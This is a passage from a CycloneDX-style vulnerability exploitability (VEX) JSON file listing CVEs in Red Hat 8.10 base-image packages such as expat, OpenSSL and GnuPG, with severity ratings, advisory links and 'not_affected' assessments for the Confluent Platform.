          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-66382",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-66382"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/12/02/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-66382"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1076"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66382"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-66382"
        }
      ],
      "published": "2025-11-28T07:15:57+00:00",
      "updated": "2026-06-17T09:56:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-68160",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: Writing large, newline-free data into a BIO chain using the\nline-buffering filter where the next BIO performs short writes can trigger\na heap-based out-of-bounds write.\n\nImpact summary: This out-of-bounds write can cause memory corruption which\ntypically results in a crash, leading to Denial of Service for an application.\n\nThe line-buffering BIO filter (BIO_f_linebuffer) is not used by default in\nTLS/SSL data paths. In OpenSSL command-line applications, it is typically\nonly pushed onto stdout/stderr on VMS systems. Third-party applications that\nexplicitly use this filter with a BIO chain that can short-write and that\nwrite large, newline-free data influenced by an attacker would be affected.\nHowever, the circumstances where this could happen are unlikely to be under\nattacker control, and BIO_f_linebuffer is unlikely to be handling non-curated\ndata controlled by an attacker. For that reason the issue was assessed as\nLow severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the BIO implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-68160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-68160"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-g78j-46j5-97cr"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/384011202af92605d926fafe4a0bcd6b65d162ad"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/475c466ef2fbd8fc1df6fae1c3eed9c813fc8ff6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4c96fbba618e1940f038012506ee9e21d32ee12c"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/6845c3b6460a98b1ec4e463baa2ea1a63a32d7c0"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/68a7cd2e2816c3a02f4d45a2ce43fc04fac97096"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-68160.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68160"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68160"
        }
      ],
      "published": "2026-01-27T16:16:15+00:00",
      "updated": "2026-06-17T09:58:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-68972",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        347
      ],
      "description": "In GnuPG through 2.4.8, if a signed message has \\f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an \"invalid armor\" message is printed during verification). This is related to use of \\f as a marker to denote truncation of a long plaintext line.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-68972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-68972"
        },
        {
          "url": "https://github.com/advisories/GHSA-w789-3q45-984r"
        },
        {
          "url": "https://gpg.fail/formfeed"
        },
        {
          "url": "https://media.ccc.de/v/39c3-to-sign-or-not-to-sign-practical-vulnerabilities-i"
        },
        {
          "url": "https://news.ycombinator.com/item?id=46404339"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68972"
        }
      ],
      "published": "2025-12-27T23:15:40+00:00",
      "updated": "2026-06-17T09:59:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
